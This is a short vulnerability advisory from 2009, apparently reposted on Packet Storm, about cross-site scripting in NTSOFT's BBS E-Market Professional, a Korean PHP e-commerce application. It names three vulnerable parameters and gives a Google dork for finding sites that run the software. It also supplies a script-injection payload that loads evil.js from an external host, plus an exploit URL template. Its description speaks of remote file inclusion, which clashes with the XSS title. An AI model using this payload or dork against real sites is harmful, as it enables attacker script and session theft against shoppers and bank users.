NTSOFT BBS E-Market Professional suffers from cross site scripting vulnerabilities.
3003fe2a354ba57934d0f3474ce9a2611490bf3048c2ef8db911956cb5c9fe69+==========================================================================+
+ NTSOFT BBS E-Market Professional & XSS - Remote Evil Java +
+==========================================================================+
Author(s): Ivan Sanchez
Product: BBS E-Market Professional
Vendor Overview: NTSOFT
Vendor Homepage: http://www.nt.co.kr/
http://www.bbs2000.co.kr/
Date: 29/07/2009
"most off all korean sites that handle e-shop , e-banking,... use this software"
Description:
------------
BBS E-Market Professional is a Korean Web based e-commerce application implemented in PHP.
BBS E-Market Professional is reported to be affected by a remote file include vulnerability that may allow an attacker to include malicious files containing arbitrary code to be executed on a vulnerable system. The issue presents itself due to improper validation of user-supplied data.
"In the past the same software had a lot of bugs in others parameters & versions"
GOOGLE DORKS:
------------
intext: "Copyright (c) 2003 NTSOFT All rights reserved"
Parameters affected:
-------------------
page= evil.js
bt_code= evil.js
b_no= evil.js
Evil Code to put:
-----------------
Example: "><script src=http://site/scripts/evil.js></script>
Example URl:
http://[TARGET]becommunity/community/index.php?pageurl=board&mode=view&b_no=Evil-code5014&bt_code=Evil-code&page=Evil-code
NULL CODE SERVICES [ www.nullcode.com.ar ] Hunting Security Bugs!
+==========================================================================+
+ NTSOFT BBS E-Market Professional & XSS - Remote Evil Java +
+==========================================================================+
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed